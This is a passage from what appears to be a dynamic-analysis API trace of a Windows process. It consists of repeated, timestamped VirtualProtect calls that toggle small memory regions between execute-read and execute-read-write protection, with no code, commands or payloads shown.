lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76ac4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.413] VirtualProtect (in: lpAddress=0x1e76ac4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.413] VirtualProtect (in: lpAddress=0x1e76b20, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.413] VirtualProtect (in: lpAddress=0x1e76b20, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.413] VirtualProtect (in: lpAddress=0x1e76b38, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.413] VirtualProtect (in: lpAddress=0x1e76b38, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b40, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b40, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b48, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b48, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b50, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.414] VirtualProtect (in: lpAddress=0x1e76b50, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.415] VirtualProtect (in: lpAddress=0x1e76b58, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.415] VirtualProtect (in: lpAddress=0x1e76b58, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.415] VirtualProtect (in: lpAddress=0x1e76b60, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.415] VirtualProtect (in: lpAddress=0x1e76b60, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.415] VirtualProtect (in: lpAddress=0x1e76b68, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b68, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b70, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b70, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b78, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b78, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.416] VirtualProtect (in: lpAddress=0x1e76b80, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.417] VirtualProtect (in: lpAddress=0x1e76b80, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.417] VirtualProtect (in: lpAddress=0x1e76b88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.417] VirtualProtect (in: lpAddress=0x1e76b88, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.417] VirtualProtect (in: lpAddress=0x1e76b9c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.417] VirtualProtect (in: lpAddress=0x1e76b9c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76c4f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76c4f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76c86, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76c86, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76ce5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.418] VirtualProtect (in: lpAddress=0x1e76ce5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76cff, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76cff, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76d70, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76d70, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76d8d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.419] VirtualProtect (in: lpAddress=0x1e76d8d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.420] VirtualProtect (in: lpAddress=0x1e76d9a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.420] VirtualProtect (in: lpAddress=0x1e76d9a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.420] VirtualProtect (in: lpAddress=0x1e76e0c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.420] VirtualProtect (in: lpAddress=0x1e76e0c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.420] VirtualProtect (in: lpAddress=0x1e76e10, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76e10, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76e53, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76e53, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76e7c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76e7c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.421] VirtualProtect (in: lpAddress=0x1e76ea4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.422] VirtualProtect (in: lpAddress=0x1e76ea4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.422] VirtualProtect (in: lpAddress=0x1e76ead, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.422] VirtualProtect (in: lpAddress=0x1e76ead, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.422] VirtualProtect (in: lpAddress=0x1e77001, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.422] VirtualProtect (in: lpAddress=0x1e77001, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e77054, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e77054, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e77058, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e77058, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e7705d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.423] VirtualProtect (in: lpAddress=0x1e7705d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.424] VirtualProtect (in: lpAddress=0x1e77139, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.424] VirtualProtect (in: lpAddress=0x1e77139, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.424] VirtualProtect (in: lpAddress=0x1e77194, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.424] VirtualProtect (in: lpAddress=0x1e77194, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.424] VirtualProtect (in: lpAddress=0x1e77198, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e77198, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e77296, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e77296, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e772f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e772f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.425] VirtualProtect (in: lpAddress=0x1e7732f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.426] VirtualProtect (in: lpAddress=0x1e7732f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.426] VirtualProtect (in: lpAddress=0x1e77363, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.426] VirtualProtect (in: lpAddress=0x1e77363, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.426] VirtualProtect (in: lpAddress=0x1e7738b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.426] VirtualProtect (in: lpAddress=0x1e7738b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.427] VirtualProtect (in: lpAddress=0x1e77394, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.427] VirtualProtect (in: lpAddress=0x1e77394, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.427] VirtualProtect (in: lpAddress=0x1e7745a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.427] VirtualProtect (in: lpAddress=0x1e7745a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.427] VirtualProtect (in: lpAddress=0x1e774ad, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e774ad, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e774b7, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e774b7, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e774fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e774fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.428] VirtualProtect (in: lpAddress=0x1e77512, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e77512, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e77520, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e77520, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e7752c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e7752c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.429] VirtualProtect (in: lpAddress=0x1e77630, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.430] VirtualProtect (in: lpAddress=0x1e77630, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.430] VirtualProtect (in: lpAddress=0x1e776aa, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.430] VirtualProtect (in: lpAddress=0x1e776aa, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.430] VirtualProtect (in: lpAddress=0x1e776da, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.430] VirtualProtect (in: lpAddress=0x1e776da, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e777c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e777c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e777fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e777fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e77800, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.431] VirtualProtect (in: lpAddress=0x1e77800, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.432] VirtualProtect (in: lpAddress=0x1e77890, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.432] VirtualProtect (in: lpAddress=0x1e77890, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.432] VirtualProtect (in: lpAddress=0x1e77946, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.432] VirtualProtect (in: lpAddress=0x1e77946, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.432] VirtualProtect (in: lpAddress=0x1e77a21, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77a21, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77a67, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77a67, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77ac6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77ac6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.433] VirtualProtect (in: lpAddress=0x1e77adb, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.434] VirtualProtect (in: lpAddress=0x1e77adb, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.434] VirtualProtect (in: lpAddress=0x1e77b48, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.434] VirtualProtect (in: lpAddress=0x1e77b48, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.434] VirtualProtect (in: lpAddress=0x1e77b65, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.434] VirtualProtect (in: lpAddress=0x1e77b65, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77c32, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77c32, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77ce3, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77ce3, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77d32, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.435] VirtualProtect (in: lpAddress=0x1e77d32, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.436] VirtualProtect (in: lpAddress=0x1e77d5a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.436] VirtualProtect (in: lpAddress=0x1e77d5a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.436] VirtualProtect (in: lpAddress=0x1e77d78, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.436] VirtualProtect (in: lpAddress=0x1e77d78, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.436] VirtualProtect (in: lpAddress=0x1e77db0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77db0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77f37, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77f37, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77f8c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77f8c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.437] VirtualProtect (in: lpAddress=0x1e77f90, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.438] VirtualProtect (in: lpAddress=0x1e77f90, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.438] VirtualProtect (in: lpAddress=0x1e78037, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.438] VirtualProtect (in: lpAddress=0x1e78037, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.438] VirtualProtect (in: lpAddress=0x1e7808b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.438] VirtualProtect (in: lpAddress=0x1e7808b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.439] VirtualProtect (in: lpAddress=0x1e780e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.440] VirtualProtect (in: lpAddress=0x1e780fe, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.440] VirtualProtect (in: lpAddress=0x1e780fe, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.440] VirtualProtect (in: lpAddress=0x1e78144, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.440] VirtualProtect (in: lpAddress=0x1e78144, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.440] VirtualProtect (in: lpAddress=0x1e78173, dwSize=0x4, 